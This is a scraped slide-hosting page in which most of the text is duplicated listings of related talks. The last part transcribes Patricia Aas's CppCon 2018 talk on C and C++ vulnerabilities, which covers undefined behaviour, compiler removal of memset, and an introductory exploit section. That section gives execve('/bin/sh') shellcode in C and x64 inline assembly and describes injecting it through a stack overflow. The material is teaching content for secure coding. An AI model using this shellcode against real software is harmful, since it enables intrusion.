04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?
Aleksandr Yampolskiy
 
Driver Debugging Basics
Driver Debugging BasicsDriver Debugging Basics
Driver Debugging Basics
Bala Subra
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
Andrey Karpov
 
Virus lab
Virus labVirus lab
Virus lab
kunalashutosh92
 
Introduction to Assembly Language
Introduction to Assembly LanguageIntroduction to Assembly Language
Introduction to Assembly Language
Motaz Saad
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Rodolpho Concurde
 
A CTF Hackers Toolbox
A CTF Hackers ToolboxA CTF Hackers Toolbox
A CTF Hackers Toolbox
Stefan
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
NETWAYS
 
Vagrant for real
Vagrant for realVagrant for real
Vagrant for real
Michele Orselli
 
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Priyanka Aash
 
Test flawfinder. This program wont compile or run; thats not
Test flawfinder. This program wont compile or run; thats not Test flawfinder. This program wont compile or run; thats not
Test flawfinder. This program wont compile or run; thats not
MoseStaton39
 
Price of an Error
Price of an ErrorPrice of an Error
Price of an Error
Andrey Karpov
 
MongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB PerformanceMongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB
 

Similar to Software Vulnerabilities in C and C++ (CppCon 2018) (20)

printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
 
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)
 
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from Kaspersky
 
Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)
 
C++ The Principles of Most Surprise
C++ The Principles of Most SurpriseC++ The Principles of Most Surprise
C++ The Principles of Most Surprise
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
 
Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?
 
Driver Debugging Basics
Driver Debugging BasicsDriver Debugging Basics
Driver Debugging Basics
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
 
Virus lab
Virus labVirus lab
Virus lab
 
Introduction to Assembly Language
Introduction to Assembly LanguageIntroduction to Assembly Language
Introduction to Assembly Language
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
 
A CTF Hackers Toolbox
A CTF Hackers ToolboxA CTF Hackers Toolbox
A CTF Hackers Toolbox
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
 
Vagrant for real
Vagrant for realVagrant for real
Vagrant for real
 
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
 
Test flawfinder. This program wont compile or run; thats not
Test flawfinder. This program wont compile or run; thats not Test flawfinder. This program wont compile or run; thats not
Test flawfinder. This program wont compile or run; thats not
 
Price of an Error
Price of an ErrorPrice of an Error
Price of an Error
 
MongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB PerformanceMongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB Performance
 

More from Patricia Aas

NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
Patricia Aas
 
Telling a story
Telling a storyTelling a story
Telling a story
Patricia Aas
 
Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introduction
Patricia Aas
 
I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)
Patricia Aas
 
Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)
Patricia Aas
 
Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)
Patricia Aas
 
Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)
Patricia Aas
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)
Patricia Aas
 
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguageThoughts On Learning A New Programming Language
Thoughts On Learning A New Programming Language
Patricia Aas
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
Patricia Aas
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
Patricia Aas
 
DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)
Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
Patricia Aas
 
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))
Patricia Aas
 
Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)
Patricia Aas
 
Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019)
Patricia Aas
 
Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)
Patricia Aas
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)
Patricia Aas
 
Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)
Patricia Aas
 

More from Patricia Aas (20)

NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
 
Telling a story
Telling a storyTelling a story
Telling a story
 
Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introduction
 
I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)
 
Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)
 
Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)
 
Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)
 
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguageThoughts On Learning A New Programming Language
Thoughts On Learning A New Programming Language
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
 
DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
 
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))
 
Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)
 
Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019)
 
Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)
 
Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)
 

Recently uploaded

First Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User EndpointsFirst Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User Endpoints
Globus
 
Software Testing Exam imp Ques Notes.pdf
Software Testing Exam imp Ques Notes.pdfSoftware Testing Exam imp Ques Notes.pdf
Software Testing Exam imp Ques Notes.pdf
MayankTawar1
 
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus
 
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data AnalysisProviding Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
Globus
 
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERRORTROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
Tier1 app
 
How Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptxHow Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptx
wottaspaceseo
 
Corporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMSCorporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMS
Tendenci - The Open Source AMS (Association Management Software)
 
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Globus
 
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Globus
 
A Comprehensive Look at Generative AI in Retail App Testing.pdf
A Comprehensive Look at Generative AI in Retail App Testing.pdfA Comprehensive Look at Generative AI in Retail App Testing.pdf
A Comprehensive Look at Generative AI in Retail App Testing.pdf
kalichargn70th171
 
Strategies for Successful Data Migration Tools.pptx
Strategies for Successful Data Migration Tools.pptxStrategies for Successful Data Migration Tools.pptx
Strategies for Successful Data Migration Tools.pptx
varshanayak241
 
BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024
Ortus Solutions, Corp
 
Using IESVE for Room Loads Analysis - Australia & New Zealand
Using IESVE for Room Loads Analysis - Australia & New ZealandUsing IESVE for Room Loads Analysis - Australia & New Zealand
Using IESVE for Room Loads Analysis - Australia & New Zealand
IES VE
 
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus
 
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Anthony Dahanne
 
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Shahin Sheidaei
 
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
XfilesPro
 
Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
Globus
 
Advanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should KnowAdvanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should Know
Peter Caitens
 
SOCRadar Research Team: Latest Activities of IntelBroker
SOCRadar Research Team: Latest Activities of IntelBrokerSOCRadar Research Team: Latest Activities of IntelBroker
SOCRadar Research Team: Latest Activities of IntelBroker
SOCRadar
 

Recently uploaded (20)

First Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User EndpointsFirst Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User Endpoints
 
Software Testing Exam imp Ques Notes.pdf
Software Testing Exam imp Ques Notes.pdfSoftware Testing Exam imp Ques Notes.pdf
Software Testing Exam imp Ques Notes.pdf
 
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024
 
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data AnalysisProviding Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
 
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERRORTROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
 
How Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptxHow Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptx
 
Corporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMSCorporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMS
 
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
 
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...
 
A Comprehensive Look at Generative AI in Retail App Testing.pdf
A Comprehensive Look at Generative AI in Retail App Testing.pdfA Comprehensive Look at Generative AI in Retail App Testing.pdf
A Comprehensive Look at Generative AI in Retail App Testing.pdf
 
Strategies for Successful Data Migration Tools.pptx
Strategies for Successful Data Migration Tools.pptxStrategies for Successful Data Migration Tools.pptx
Strategies for Successful Data Migration Tools.pptx
 
BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024
 
Using IESVE for Room Loads Analysis - Australia & New Zealand
Using IESVE for Room Loads Analysis - Australia & New ZealandUsing IESVE for Room Loads Analysis - Australia & New Zealand
Using IESVE for Room Loads Analysis - Australia & New Zealand
 
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024
 
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
 
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
 
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
 
Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
 
Advanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should KnowAdvanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should Know
 
SOCRadar Research Team: Latest Activities of IntelBroker
SOCRadar Research Team: Latest Activities of IntelBrokerSOCRadar Research Team: Latest Activities of IntelBroker
SOCRadar Research Team: Latest Activities of IntelBroker
 

Software Vulnerabilities in C and C++ (CppCon 2018)

  • 2. Software Vulnerabilities in C and C++ @pati_gallardo Patricia Aas CppCon 2018 T S
  • 3. Patricia Aas - Consultant T S C++ Programmer, Application Security Currently : T S Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science - main language Java Pronouns: she/her
  • 4. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 6. undefined behavior “Examples of undefined behavior are memory accesses outside of array bounds, signed integer overflow, null pointer dereference, modification of the same scalar more than once in an expression without sequence points, access to an object through a pointer of a different type, etc. Compilers are not required to diagnose undefined behavior (although many simple situations are diagnosed), and the compiled program is not required to do anything meaningful.” http://en.cppreference.com/w/cpp/language/ub @pati_gallardo 6
  • 7. - Don’t reason about undefined behaviour - Assume that it crashes or is never executed - Changing compiler, compiler version or optimization level can break your application Undefined Behaviour
  • 8. Infinite Loop int main(void) { complex<int> delta; complex<int> mc[4] = {0}; for(int di = 0; di < 4; di++, delta = mc[di]) cout << di << endl; } (Thanks to @shafikyaghmour) https://stackoverflow.com/questions/32506643/c-compilation-bug Undefined Behavior: Access out of bounds @pati_gallardo 8
  • 9. Infinite Loop Want to give it a try? Compiler Explorer https://godbolt.org/g/TDjM8h Wandbox https://wandbox.org/permlink/aAFP2bMjA3um3L4K Github https://github.com/patricia-gallardo/insecure-coding-examples/ blob/master/vulnerable/infinite_loop.cpp @pati_gallardo (Thanks to @shafikyaghmour) https://stackoverflow.com/questions/32506643/c-compilation-bug9
  • 10. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 12. CG: C++ Core Guidelines (328 pages!) @pati_gallardo
  • 13. SEI: CERT C++ Coding Standard (435 pages!) @pati_gallardo
  • 14. CWE : Common Weakness Enumeration (1572 pages!) @pati_gallardo
  • 15. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 17. @pati_gallardo The Case Of The Disappearing Memset @pati_gallardo
  • 18. CWE-14: Compiler Removal of Code to Clear Buffers void GetData(char *MFAddr) { char pwd[64]; if (GetPasswordFromUser(pwd, sizeof(pwd))) { if (ConnectToMainframe(MFAddr, pwd)) { // Interaction with mainframe } } memset(pwd, 0, sizeof(pwd)); // <- Removed by the optimizer } SEI: MSC06-C. Beware of compiler optimizations SEI: MEM03-C. Clear sensitive information stored in reusable resources @pati_gallardo 18
  • 19. Want to give it a try? https://godbolt.org/g/FpEsht SEI: MSC06-C. Beware of compiler optimizations SEI: MEM03-C. Clear sensitive information stored in reusable resources @pati_gallardo 19 CWE-14: Compiler Removal of Code to Clear Buffers
  • 20. Memset_s : Zeroing Memory // Compliant Solution (C11) memset_s(pwd, 0, sizeof(pwd)); // Windows Solution SecureZeroMemory(pwd, sizeof(pwd)); SEI: MSC06-C. Beware of compiler optimizations SEI: MEM03-C. Clear sensitive information stored in reusable resources @pati_gallardo 20
  • 21. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 23. Smashing The Stack For Fun And Profit Aleph One, Phrack Magazine issue 49 @pati_gallardo 23
  • 24. Stack Overflow Code: github.com/patricia-gallardo/insecure-coding-examples/ (directory: smashing) Thanks to #security on #include Discord, especially Vesim and hthh @pati_gallardo 24
  • 26. $
  • 27. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo 27 Write inline assembly, eliminating zero bytes
  • 28. Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); @pati_gallardo Target Process Vulnerable Program Target Process /bin/sh Shellcode 28
  • 29. Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall number : 59 (x64) %rdi : const char *filename %rsi : const char *const argv[] %rdx : const char *const envp[] @pati_gallardo 29
  • 30. C code for our shellcode #include <unistd.h> int main(void) { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } @pati_gallardo 30
  • 31. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo Write inline assembly, eliminating zero bytes 31
  • 32. int main(void) { __asm__( "jmp push_stringnt" "pop_string: pop %rdint" … "push_string: call pop_stringnt" ".string "/bin/sh"nt" ); } @pati_gallardo 32
  • 33. Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall number : 59 (x64) %rdi : const char *filename %rsi : const char *const argv[] %rdx : const char *const envp[] @pati_gallardo 33
  • 34. 1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 34
  • 35. C code for our shellcode #include <unistd.h> int main(void) { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } @pati_gallardo 35
  • 36. 1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 36
  • 37. argv[0] (%rsp) /bin/sh argv[1] 8(%rsp) NULL %rax : syscall number (59 x64) %rdi : const char *filename %rsi : const char *const argv[] %rdx : const char *const envp[] %rdi /bin/sh %rdx 0 (NULL) %rax $0x3b (59, execve syscall #) %rsi %rsp Stack Registers 37
  • 38. 1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 38
